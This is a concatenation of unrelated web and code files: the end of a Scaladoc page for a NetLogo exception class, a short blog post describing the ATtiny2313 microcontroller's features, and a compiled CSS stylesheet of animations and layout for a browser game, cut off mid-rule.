class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>Throwable</dd></dl></div> </li><li visbl="pub" name="scala.AnyRef#hashCode" data-isabs="false"> <a id="hashCode():Int"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">hashCode</span> <span class="params">()</span><span class="result">: <span name="scala.Int" class="extype">Int</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef → Any</dd></dl></div> </li><li visbl="pub" name="java.lang.Throwable#initCause" data-isabs="false"> <a id="initCause(Throwable):Throwable"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">initCause</span> <span class="params">(<span name="arg0">arg0: <span name="java.lang.Throwable" class="extype">Throwable</span></span>)</span><span class="result">: <span name="java.lang.Throwable" class="extype">Throwable</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>Throwable</dd></dl></div> </li><li visbl="pub" name="scala.Any#isInstanceOf" data-isabs="false"> <a id="isInstanceOf[T0]:Boolean"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">isInstanceOf</span> <span class="tparams">[<span name="T0">T0</span>]</span> <span class="result">: <span name="scala.Boolean" class="extype">Boolean</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>Any</dd></dl></div> </li><li visbl="pub" name="scala.AnyRef#ne" data-isabs="false"> <a id="ne(AnyRef):Boolean"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">ne</span> <span class="params">(<span name="arg0">arg0: AnyRef</span>)</span><span class="result">: <span name="scala.Boolean" class="extype">Boolean</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>AnyRef</dd></dl></div> </li><li visbl="pub" name="scala.AnyRef#notify" data-isabs="false"> <a id="notify():Unit"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">notify</span> <span class="params">()</span><span class="result">: <span name="scala.Unit" class="extype">Unit</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>AnyRef</dd></dl></div> </li><li visbl="pub" name="scala.AnyRef#notifyAll" data-isabs="false"> <a id="notifyAll():Unit"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">notifyAll</span> <span class="params">()</span><span class="result">: <span name="scala.Unit" class="extype">Unit</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>AnyRef</dd></dl></div> </li><li visbl="pub" name="java.lang.Throwable#printStackTrace" data-isabs="false"> <a id="printStackTrace(PrintWriter):Unit"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">printStackTrace</span> <span class="params">(<span name="arg0">arg0: <span name="java.io.PrintWriter" class="extype">PrintWriter</span></span>)</span><span class="result">: <span name="scala.Unit" class="extype">Unit</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>Throwable</dd></dl></div> </li><li visbl="pub" name="java.lang.Throwable#printStackTrace" data-isabs="false"> <a id="printStackTrace(PrintStream):Unit"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">printStackTrace</span> <span class="params">(<span name="arg0">arg0: <span name="java.io.PrintStream" class="extype">PrintStream</span></span>)</span><span class="result">: <span name="scala.Unit" class="extype">Unit</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>Throwable</dd></dl></div> </li><li visbl="pub" name="java.lang.Throwable#printStackTrace" data-isabs="false"> <a id="printStackTrace():Unit"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">printStackTrace</span> <span class="params">()</span><span class="result">: <span name="scala.Unit" class="extype">Unit</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>Throwable</dd></dl></div> </li><li visbl="prt" name="org.nlogo.nvm.NonLocalExit#readResolve" data-isabs="false"> <a id="readResolve():AnyRef"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">readResolve</span> <span class="params">()</span><span class="result">: AnyRef</span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>protected </dd></dl></div> </li><li visbl="pub" name="java.lang.Throwable#setStackTrace" data-isabs="false"> <a id="setStackTrace(Array[StackTraceElement]):Unit"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">setStackTrace</span> <span class="params">(<span name="arg0">arg0: <span name="scala.Array" class="extype">Array</span>[<span name="java.lang.StackTraceElement" class="extype">StackTraceElement</span>]</span>)</span><span class="result">: <span name="scala.Unit" class="extype">Unit</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>Throwable</dd></dl></div> </li><li visbl="pub" name="scala.AnyRef#synchronized" data-isabs="false"> <a id="synchronized[T0](⇒ T0):T0"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">synchronized</span> <span class="tparams">[<span name="T0">T0</span>]</span> <span class="params">(<span name="arg0">arg0: ⇒ T0</span>)</span><span class="result">: T0</span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>AnyRef</dd></dl></div> </li><li visbl="pub" name="java.lang.Throwable#toString" data-isabs="false"> <a id="toString():String"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">toString</span> <span class="params">()</span><span class="result">: <span name="java.lang.String" class="extype">String</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>Throwable → AnyRef → Any</dd></dl></div> </li><li visbl="pub" name="scala.AnyRef#wait" data-isabs="false"> <a id="wait():Unit"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">wait</span> <span class="params">()</span><span class="result">: <span name="scala.Unit" class="extype">Unit</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>AnyRef</dd><dt>Annotations</dt><dd> <span class="name">@throws</span><span class="args">()</span> </dd></dl></div> </li><li visbl="pub" name="scala.AnyRef#wait" data-isabs="false"> <a id="wait(Long,Int):Unit"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">wait</span> <span class="params">(<span name="arg0">arg0: <span name="scala.Long" class="extype">Long</span></span>, <span name="arg1">arg1: <span name="scala.Int" class="extype">Int</span></span>)</span><span class="result">: <span name="scala.Unit" class="extype">Unit</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>AnyRef</dd><dt>Annotations</dt><dd> <span class="name">@throws</span><span class="args">()</span> </dd></dl></div> </li><li visbl="pub" name="scala.AnyRef#wait" data-isabs="false"> <a id="wait(Long):Unit"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">wait</span> <span class="params">(<span name="arg0">arg0: <span name="scala.Long" class="extype">Long</span></span>)</span><span class="result">: <span name="scala.Unit" class="extype">Unit</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>AnyRef</dd><dt>Annotations</dt><dd> <span class="name">@throws</span><span class="args">()</span> </dd></dl></div> </li></ol> </div> <div name="java.lang.RuntimeException" class="parent"> <h3>Inherited from <span name="java.lang.RuntimeException" class="extype">RuntimeException</span></h3> </div><div name="java.lang.Exception" class="parent"> <h3>Inherited from <span name="java.lang.Exception" class="extype">Exception</span></h3> </div><div name="java.lang.Throwable" class="parent"> <h3>Inherited from <span name="java.lang.Throwable" class="extype">Throwable</span></h3> </div><div name="java.io.Serializable" class="parent"> <h3>Inherited from <span name="java.io.Serializable" class="extype">Serializable</span></h3> </div><div name="scala.AnyRef" class="parent"> <h3>Inherited from AnyRef</h3> </div><div name="scala.Any" class="parent"> <h3>Inherited from <span name="scala.Any" class="extype">Any</span></h3> </div> </div> <div id="tooltip"></div> </body> </html>
attiny2313v-microcontroller.html
softctrl/0x09
<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="http://3.bp.blogspot.com/-dkzGWzub5Mc/UlVSZz1fyoI/AAAAAAAAA_g/WHa4R_d2hBE/s1600/img02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-dkzGWzub5Mc/UlVSZz1fyoI/AAAAAAAAA_g/WHa4R_d2hBE/s1600/img02.png" /></a></div> ATtiny2313 is a low-power CMOS 8-bit microcontroller based on the AVR enhanced RISC architecture. By executing powerful instructions in a single clock cycle, the ATtiny2313 achieves throughputs approaching 1 MIPS per MHz allowing the system designer to optimize power con- sumption versus processing speed. <div class="separator" style="clear: both; text-align: center;"> <a href="http://2.bp.blogspot.com/-60qbv_si1Bc/UlVEu3mBU7I/AAAAAAAAA_E/arcFh6voe7I/s1600/img00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="177" src="https://2.bp.blogspot.com/-60qbv_si1Bc/UlVEu3mBU7I/AAAAAAAAA_E/arcFh6voe7I/s1600/img00.png" width="320" /></a></div> <div> This microcontroller has a set with 32 general purpose registers. All those are connected to the arithmetic logic unit.</div> <div> </div> <div> <div> Provides this features:</div> <div> <ul> <li>2K bytes of In-System Programmable Flash</li> <li>128 bytes EEPROM</li> <li>128 bytes SRAM</li> <li>18 general purpose I/O lines</li> <li>32 general purpose working registers</li> <li>A single-wire Interface for On-chip Debugging</li> <li>Two flexible Timer/Counters with compare modes</li> <li>Internal and external interrupts</li> <li>A serial programmable USART</li> <li>Universal Serial Interface with Start Condition Detector</li> <li>A programmable Watchdog Timer with internal Oscillator</li> <li>Three software selectable power saving modes</li> </ul> </div> </div> <div> </div> <div> The Diagram of the ATtiny2313 architecture:</div> <div> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="http://1.bp.blogspot.com/-Kb_h6L_k6UM/UlVGbG98gqI/AAAAAAAAA_Q/_9h9rJTrG0g/s1600/img01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="392" src="https://1.bp.blogspot.com/-Kb_h6L_k6UM/UlVGbG98gqI/AAAAAAAAA_Q/_9h9rJTrG0g/s1600/img01.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: left;"> </div> <div class="separator" style="clear: both; text-align: left;"> This is a very powerful microcontroller and with a low cost too. In next post i will show you a utilization sample of this microcontroller.</div> <div class="separator" style="clear: both; text-align: left;"> </div> <div class="separator" style="clear: both; text-align: left;"> thanks.</div> <div class="separator" style="clear: both; text-align: left;"> </div> <div class="separator" style="clear: both; text-align: left;"> <a href="http://www.atmel.com/devices/attiny2313.aspx" target="_blank">http://www.atmel.com/devices/attiny2313.aspx</a></div> <div class="separator" style="clear: both; text-align: left;"> </div> </div>
stylesheets/screen.css
Rukshani/AnyYolk
/* line 17, ../../../../.rvm/gems/ruby-1.9.3-p327/gems/compass-0.12.2/frameworks/compass/stylesheets/compass/reset/_utilities.scss */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video { margin: 0; padding: 0; border: 0; font: inherit; font-size: 100%; vertical-align: baseline; } /* line 22, ../../../../.rvm/gems/ruby-1.9.3-p327/gems/compass-0.12.2/frameworks/compass/stylesheets/compass/reset/_utilities.scss */ html { line-height: 1; } /* line 24, ../../../../.rvm/gems/ruby-1.9.3-p327/gems/compass-0.12.2/frameworks/compass/stylesheets/compass/reset/_utilities.scss */ ol, ul { list-style: none; } /* line 26, ../../../../.rvm/gems/ruby-1.9.3-p327/gems/compass-0.12.2/frameworks/compass/stylesheets/compass/reset/_utilities.scss */ table { border-collapse: collapse; border-spacing: 0; } /* line 28, ../../../../.rvm/gems/ruby-1.9.3-p327/gems/compass-0.12.2/frameworks/compass/stylesheets/compass/reset/_utilities.scss */ caption, th, td { text-align: left; font-weight: normal; vertical-align: middle; } /* line 30, ../../../../.rvm/gems/ruby-1.9.3-p327/gems/compass-0.12.2/frameworks/compass/stylesheets/compass/reset/_utilities.scss */ q, blockquote { quotes: none; } /* line 103, ../../../../.rvm/gems/ruby-1.9.3-p327/gems/compass-0.12.2/frameworks/compass/stylesheets/compass/reset/_utilities.scss */ q:before, q:after, blockquote:before, blockquote:after { content: ""; content: none; } /* line 32, ../../../../.rvm/gems/ruby-1.9.3-p327/gems/compass-0.12.2/frameworks/compass/stylesheets/compass/reset/_utilities.scss */ a img { border: none; } /* line 116, ../../../../.rvm/gems/ruby-1.9.3-p327/gems/compass-0.12.2/frameworks/compass/stylesheets/compass/reset/_utilities.scss */ article, aside, details, figcaption, figure, footer, header, hgroup, menu, nav, section, summary { display: block; } /* Animations */ /* Clouds */ @-webkit-keyframes moveLeft { /* line 31, ../sass/screen.scss */ from { margin-left: 0%; } /* line 32, ../sass/screen.scss */ to { margin-left: 150%; } } @-moz-keyframes moveLeft { /* line 35, ../sass/screen.scss */ from { margin-left: 0%; } /* line 36, ../sass/screen.scss */ to { margin-left: 150%; } } @keyframes moveLeft { /* line 39, ../sass/screen.scss */ from { margin-left: 0%; } /* line 40, ../sass/screen.scss */ to { margin-left: 150%; } } @-webkit-keyframes moveRight { /* line 44, ../sass/screen.scss */ from { margin-left: 150%; } /* line 45, ../sass/screen.scss */ to { margin-left: 0%; } } @-moz-keyframes moveRight { /* line 48, ../sass/screen.scss */ from { margin-left: 150%; } /* line 49, ../sass/screen.scss */ to { margin-left: 0%; } } @keyframes moveRight { /* line 52, ../sass/screen.scss */ from { margin-left: 150%; } /* line 53, ../sass/screen.scss */ to { margin-left: 0%; } } /* Title */ @-webkit-keyframes dropTitle { /* line 58, ../sass/screen.scss */ 0% { margin-top: -50%; -webkit-transform: rotate(-10deg); } /* line 59, ../sass/screen.scss */ 70% { -webkit-transform: rotate(10deg); } /* line 60, ../sass/screen.scss */ 100% { margin-top: 10%; -webkit-transform: rotate(2deg); } } @-moz-keyframes dropTitle { /* line 63, ../sass/screen.scss */ 0% { margin-top: -50%; -moz-transform: rotate(-10deg); } /* line 64, ../sass/screen.scss */ 70% { -moz-transform: rotate(20deg); } /* line 65, ../sass/screen.scss */ 100% { margin-top: 10%; -moz-transform: rotate(2deg); } } @keyframes dropTitle { /* line 68, ../sass/screen.scss */ 0% { margin-top: -50%; transform: rotate(-10deg); } /* line 69, ../sass/screen.scss */ 70% { transform: rotate(20deg); } /* line 70, ../sass/screen.scss */ 100% { margin-top: 10%; transform: rotate(2deg); } } @-webkit-keyframes raiseTitle { /* line 74, ../sass/screen.scss */ 0% { margin-top: 10%; -webkit-transform: rotate(2deg); } /* line 75, ../sass/screen.scss */ 10% { margin-top: 10%; -webkit-transform: rotate(-10deg); } /* line 76, ../sass/screen.scss */ 100% { margin-top: -50%; margin-bottom: 70%; -webkit-transform: rotate(2deg); } } @-moz-keyframes raiseTitle { /* line 79, ../sass/screen.scss */ 0% { margin-top: 10%; -moz-transform: rotate(2deg); } /* line 80, ../sass/screen.scss */ 10% { margin-top: 10%; -moz-transform: rotate(-10deg); } /* line 81, ../sass/screen.scss */ 100% { margin-top: -50%; margin-bottom: 70%; -moz-transform: rotate(2deg); } } @keyframes raiseTitle { /* line 84, ../sass/screen.scss */ 0% { margin-top: 10%; transform: rotate(2deg); } /* line 85, ../sass/screen.scss */ 10% { margin-top: 10%; transform: rotate(-10deg); } /* line 86, ../sass/screen.scss */ 100% { margin-top: -50%; margin-bottom: 70%; transform: rotate(2deg); } } /* Menu */ @-webkit-keyframes dropMenu { /* line 92, ../sass/screen.scss */ 0% { opacity: 0; -webkit-transform: rotate(-10deg) scale(1.1, 1.1); } /* line 93, ../sass/screen.scss */ 1% { opacity: 1; -webkit-transform: rotate(-10deg) scale(1.1, 1.1); } /* line 94, ../sass/screen.scss */ 100% { -webkit-transform: rotate(0deg) scale(1, 1); } } @-moz-keyframes dropMenu { /* line 97, ../sass/screen.scss */ 0% { opacity: 0; -moz-transform: rotate(-10deg) scale(1.1, 1.1); } /* line 98, ../sass/screen.scss */ 1% { opacity: 1; -moz-transform: rotate(-10deg) scale(1.1, 1.1); } /* line 99, ../sass/screen.scss */ 100% { -webkit-transform: rotate(0deg) scale(1, 1); } } @keyframes dropMenu { /* line 102, ../sass/screen.scss */ 0% { opacity: 0; transform: rotate(-10deg) scale(1.1, 1.1); } /* line 103, ../sass/screen.scss */ 1% { opacity: 1; transform: rotate(-10deg) scale(1.1, 1.1); } /* line 104, ../sass/screen.scss */ 100% { -webkit-transform: rotate(0deg) scale(1, 1); } } @-webkit-keyframes raiseMenu { /* line 108, ../sass/screen.scss */ 0% { -webkit-transform: rotate(0deg) scale(1, 1); opacity: 1; } /* line 109, ../sass/screen.scss */ 100% { -webkit-transform: rotate(-10deg) scale(1.1, 1.1); opacity: 0; } } @-moz-keyframes raiseMenu { /* line 112, ../sass/screen.scss */ 0% { -moz-transform: rotate(0deg) scale(1, 1); opacity: 1; } /* line 113, ../sass/screen.scss */ 100% { -moz-transform: rotate(-10deg) scale(1.1, 1.1); opacity: 0; } } @keyframes raiseMenu { /* line 116, ../sass/screen.scss */ 0% { transform: rotate(0deg) scale(1, 1); opacity: 1; } /* line 117, ../sass/screen.scss */ 100% { transform: rotate(-10deg) scale(1.1, 1.1); opacity: 0; } } /* Sun */ @-webkit-keyframes radiate { /* line 122, ../sass/screen.scss */ 0% { -webkit-transform: scale(0.9, 0.9); } /* line 123, ../sass/screen.scss */ 100% { -webkit-transform: scale(1.1, 1.1); } } @-moz-keyframes radiate { /* line 126, ../sass/screen.scss */ 0% { -moz-transform: scale(0.9, 0.9); } /* line 127, ../sass/screen.scss */ 100% { -moz-transform: scale(1.1, 1.1); } } @keyframes radiate { /* line 130, ../sass/screen.scss */ 0% { transform: scale(0.9, 0.9); } /* line 131, ../sass/screen.scss */ 100% { transform: scale(1.1, 1.1); } } /* HUD */ @-webkit-keyframes showHUD { /* line 136, ../sass/screen.scss */ 0% { opacity: 0; -webkit-transform: rotate(-10deg) scale(1.1, 1.1); } /* line 137, ../sass/screen.scss */ 1% { opacity: 1; -webkit-transform: rotate(-10deg) scale(1.1, 1.1); } /* line 138, ../sass/screen.scss */ 100% { -webkit-transform: rotate(0deg) scale(1, 1); } } @-moz-keyframes showHUD { /* line 141, ../sass/screen.scss */ 0% { opacity: 0; -moz-transform: rotate(-10deg) scale(1.1, 1.1); } /* line 142, ../sass/screen.scss */ 1% { opacity: 1; -moz-transform: rotate(-10deg) scale(1.1, 1.1); } /* line 143, ../sass/screen.scss */ 100% { -moz-transform: rotate(0deg) scale(1, 1); } } @keyframes showHUD { /* line 146, ../sass/screen.scss */ 0% { opacity: 0; transform: rotate(-10deg) scale(1.1, 1.1); } /* line 147, ../sass/screen.scss */ 1% { opacity: 1; transform: rotate(-10deg) scale(1.1, 1.1); } /* line 148, ../sass/screen.scss */ 100% { transform: rotate(0deg) scale(1, 1); } } @-webkit-keyframes removeHUD { /* line 152, ../sass/screen.scss */ 0% { opacity: 1; -webkit-transform: rotate(0deg) scale(1, 1); } /* line 153, ../sass/screen.scss */ 100% { opacity: 0; -webkit-transform: rotate(-10deg) scale(1.1, 1.1); } } @-moz-keyframes removeHUD { /* line 156, ../sass/screen.scss */ 0% { opacity: 1; -moz-transform: rotate(0deg) scale(1, 1); } /* line 157, ../sass/screen.scss */ 100% { opacity: 0; -moz-transform: rotate(-10deg) scale(1.1, 1.1); } } @keyframes removeHUD { /* line 160, ../sass/screen.scss */ 0% { opacity: 1; transform: rotate(0deg) scale(1, 1); } /* line 161, ../sass/screen.scss */ 100% { opacity: 0; transform: rotate(-10deg) scale(1.1, 1.1); } } /* return button */ @-webkit-keyframes xDrop { /* line 166, ../sass/screen.scss */ 0% { top: -80px; -webkit-transform: rotate(400deg); } /* line 167, ../sass/screen.scss */ 90% { top: 20px; -webkit-transform: rotate(30deg); } /* line 168, ../sass/screen.scss */ 100% { top: 20px; -webkit-transform: rotate(0deg); } } @-moz-keyframes xDrop { /* line 171, ../sass/screen.scss */ 0% { top: -80px; -moz-transform: rotate(400deg); } /* line 172, ../sass/screen.scss */ 90% { top: 20px; -moz-transform: rotate(30deg); } /* line 173, ../sass/screen.scss */ 100% { top: 20px; -moz-transform: rotate(0deg); } } @keyframes xDrop { /* line 176, ../sass/screen.scss */ 0% { top: -80px; transform: rotate(400deg); } /* line 177, ../sass/screen.scss */ 90% { top: 20px; transform: rotate(30deg); } /* line 178, ../sass/screen.scss */ 100% { top: 20px; transform: rotate(0deg); } } @-webkit-keyframes xRaise { /* line 182, ../sass/screen.scss */ 0% { top: 20px; -webkit-transform: rotate(0deg); } /* line 183, ../sass/screen.scss */ 10% { top: 20px; -webkit-transform: rotate(30deg); } /* line 184, ../sass/screen.scss */ 100% { top: -80px; -webkit-transform: rotate(400deg); } } @-moz-keyframes xRaise { /* line 187, ../sass/screen.scss */ 0% { top: 20px; -moz-transform: rotate(0deg); } /* line 188, ../sass/screen.scss */ 10% { top: 20px; -moz-transform: rotate(30deg); } /* line 189, ../sass/screen.scss */ 100% { top: -80px; -moz-transform: rotate(400deg); } } @keyframes xRaise { /* line 192, ../sass/screen.scss */ 0% { top: 20px; transform: rotate(0deg); } /* line 193, ../sass/screen.scss */ 10% { top: 20px; transform: rotate(30deg); } /* line 194, ../sass/screen.scss */ 100% { top: -80px; transform: rotate(400deg); } } /* highscore */ @-webkit-keyframes dropScores { /* line 200, ../sass/screen.scss */ 0% { -webkit-transform: rotate(-2deg) scale(1.1, 1.1); opacity: 0; } /* line 201, ../sass/screen.scss */ 1% { -webkit-transform: rotate(-2deg) scale(1.1, 1.1); opacity: 1; } /* line 202, ../sass/screen.scss */ 100% { -webkit-transform: rotate(1deg) scale(1, 1); opacity: 1; } } @-moz-keyframes dropScores { /* line 205, ../sass/screen.scss */ 0% { -moz-transform: rotate(-2deg) scale(1.1, 1.1); opacity: 0; } /* line 206, ../sass/screen.scss */ 1% { -moz-transform: rotate(-2deg) scale(1.1, 1.1); opacity: 1; } /* line 207, ../sass/screen.scss */ 100% { -moz-transform: rotate(1deg) scale(1, 1); opacity: 1; } } @keyframes dropScores { /* line 210, ../sass/screen.scss */ 0% { transform: rotate(-2deg) scale(1.1, 1.1); opacity: 0; } /* line 211, ../sass/screen.scss */ 1% { transform: rotate(-2deg) scale(1.1, 1.1); opacity: 1; } /* line 212, ../sass/screen.scss */ 100% { transform: rotate(1deg) scale(1, 1); opacity: 1; } } @-webkit-keyframes raiseScores { /* line 216, ../sass/screen.scss */ 0% { -webkit-transform: rotate(1deg) scale(1, 1); opacity: 1; } /* line 217, ../sass/screen.scss */ 100% { -webkit-transform: rotate(-2deg) scale(1.1, 1.1); opacity: 0; } } @-moz-keyframes raiseScores { /* line 220, ../sass/screen.scss */ 0% { -moz-transform: rotate(1deg) scale(1, 1); opacity: 1; } /* line 221, ../sass/screen.scss */ 100% { -moz-transform: rotate(-2deg) scale(1.1, 1.1); opacity: 0; } } @keyframes raiseScores { /* line 224, ../sass/screen.scss */ 0% { transform: rotate(1deg) scale(1, 1); opacity: 1; } /* line 225, ../sass/screen.scss */ 100% { transform: rotate(-2deg) scale(1.1, 1.1); opacity: 0; } } /* game over */ @-webkit-keyframes pulsate { /* line 232, ../sass/screen.scss */ 0% { -webkit-transform: scale(0.8, 0.8); } /* line 233, ../sass/screen.scss */ 100% { -webkit-transform: scale(1.2, 1.2); } } @-moz-keyframes pulsate { /* line 236, ../sass/screen.scss */ 0% { -moz-transform: scale(0.8, 0.8); } /* line 237, ../sass/screen.scss */ 100% { -moz-transform: scale(1.2, 1.2); } } @keyframes pulsate { /* line 240, ../sass/screen.scss */ 0% { transform: scale(0.8, 0.8); } /* line 241, ../sass/screen.scss */ 100% { transform: scale(1.2, 1.2); } } @-webkit-keyframes dropMessage { /* line 245, ../sass/screen.scss */ 0% { opacity: 0; -webkit-transform: rotate(10deg) scale(3, 3); } /* line 246, ../sass/screen.scss */ 1% { opacity: 1; -webkit-transform: rotate(10deg) scale(3, 3); } /* line 247, ../sass/screen.scss */ 100% { -webkit-transform: rotate(-5deg) scale(1, 1); } } @-moz-keyframes dropMessage { /* line 250, ../sass/screen.scss */ 0% { opacity: 0; -moz-transform: rotate(-10deg) scale(1.1, 1.1); } /* line 251, ../sass/screen.scss */ 1% { opacity: 1; -moz-transform: rotate(-10deg) scale(1.1, 1.1); } /* line 252, ../sass/screen.scss */ 100% { -moz-transform: rotate(0deg) scale(1, 1); } } @keyframes dropMessage { /* line 255, ../sass/screen.scss */ 0% { opacity: 0; transform: rotate(-10deg) scale(1.1, 1.1); } /* line 256, ../sass/screen.scss */ 1% { opacity: 1; transform: rotate(-10deg) scale(1.1, 1.1); } /* line 257, ../sass/screen.scss */ 100% { transform: rotate(0deg) scale(1, 1); } } @-webkit-keyframes raiseMessage { /* line 261, ../sass/screen.scss */ 0% { opacity: 1; -webkit-transform: rotate(-5deg) scale(1, 1); } /* line 262, ../sass/screen.scss */ 100% { opacity: 0; -webkit-transform: rotate(10deg) scale(3, 3); } } @-moz-keyframes raiseMessage { /* line 265, ../sass/screen.scss */ 0% { opacity: 1; -moz-transform: rotate(-5deg) scale(1, 1); } /* line 266, ../sass/screen.scss */ 100% { opacity: 0; -moz-transform: rotate(10deg) scale(3, 3); } } @keyframes raiseMessage { /* line 269, ../sass/screen.scss */ 0% { opacity: 1; transform: rotate(-5deg) scale(1, 1); } /* line 270, ../sass/screen.scss */ 100% { opacity: 0; transform: rotate(10deg) scale(3, 3); } } /* Styles */ @font-face { font-family: 'BDCartoon'; src: url("../assets/bd_cartoon.ttf") format("truetype"); font-weight: normal; font-style: normal; } /* line 352, ../sass/screen.scss */ body { background: url(../assets/bg.png) repeat 0 0, #660000; } /* line 356, ../sass/screen.scss */ #unsupported { display: none; text-align: center; font-family: BDCartoon, "Helvetica Neue", Helvetica, Arial; font-size: 30px; padding-top: 100px; } /* line 364, ../sass/screen.scss */ #landscape { display: none; text-align: center; font-family: BDCartoon, "Helvetica Neue", Helvetica, Arial; font-size: 30px; padding-top: 100px; color: white; } @media only screen and (orientation: portrait) { /* line 374, ../sass/screen.scss */ #landscape { display: none; } /* line 375, ../sass/screen.scss */ #stage { display: block; } } @media only screen and (orientation: landscape) and (max-device-height: 568px) { /* line 378, ../sass/screen.scss */ #landscape { display: block; } /* line 379, ../sass/screen.scss */ #stage { display: none; } } /* line 382, ../sass/screen.scss */ #stage { -moz-user-select: none; -khtml-user-select: none; -webkit-user-select: none; user-select: none; background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #a2c9fd), color-stop(100%, #ddf6ff)); background-image: -webkit-linear-gradient(#a2c9fd, #ddf6ff); background-image: -moz-linear-gradient(#a2c9fd, #ddf6ff); background-image: -o-linear-gradient(#a2c9fd, #ddf6ff); background-image: linear-gradient(#a2c9fd, #ddf6ff); background-color: #bcd8fe; max-height: 1000px; margin: auto; height: 1000px; position: relative; overflow: hidden; } /* line 396, ../sass/screen.scss */ #stage .tile { width: 100%; background: url(/assets/tiles.png) repeat-x; height: 160px; position: absolute; bottom: 0px; background-size: contain; z-index: 1; } /* line 405, ../sass/screen.scss */ #stage .tile.top { bottom: 44px; } /* line 409, ../sass/screen.scss */ #stage .tile.bottom { bottom: -10px; } /* line 415, ../sass/screen.scss */ #stage .tree { height: 300px; position: absolute; bottom: 90px; z-index: 2; } /* line 423, ../sass/screen.scss */ #stage .sun { height: 128px; position: absolute; top: 30px; -webkit-animation: radiate 3s 0s ease-in-out infinite alternate both; -moz-animation: radiate 3s 0s ease-in-out infinite alternate both; -ms-animation: radiate 3s 0s ease-in-out infinite alternate both; animation: radiate 3s 0s ease-in-out infinite alternate both; } /* line 431, ../sass/screen.scss */ #stage .cloud { width: 200px; position: absolute; background: url(/assets/cloud.png) no-repeat; background-size: contain; height: 110px; opacity: 0.9; z-index: 10; pointer-events: none; } /* line 441, ../sass/screen.scss */ #stage .cloud.left { -webkit-animation: moveLeft 1s 0s linear infinite normal both; -moz-animation: moveLeft 1s 0s linear infinite normal both; -ms-animation: moveLeft 1s 0s linear infinite normal both; animation: moveLeft 1s 0s linear infinite normal both; } /* line 445, ../sass/screen.scss */ #stage .cloud.right { -webkit-animation: moveRight 1s 0s linear infinite normal both; -moz-animation: moveRight 1s 0s linear infinite normal both; -ms-animation: moveRight 1s 0s linear infinite normal both; animation: moveRight 1s 0s linear infinite normal both; } /* line 451, ../sass/screen.scss */ #stage .menu_scene .title { display: block; margin-left: auto; margin-right: auto; -webkit-animation: dropTitle 1s 0s cubic-bezier(0.5, 1.3, 0.7, 1) 1 normal both; -moz-animation: dropTitle 1s 0s cubic-bezier(0.5, 1.3, 0.7, 1) 1 normal both; -ms-animation: dropTitle 1s 0s cubic-bezier(0.5, 1.3, 0.7, 1) 1 normal both; animation: dropTitle 1s 0s cubic-bezier(0.5, 1.3, 0.7, 1) 1 normal both; max-width: 500px; width: 90%; height: 175px; background: url(/assets/Logo.png) no-repeat; background-size: 100%; background-size: contain !important; z-index: 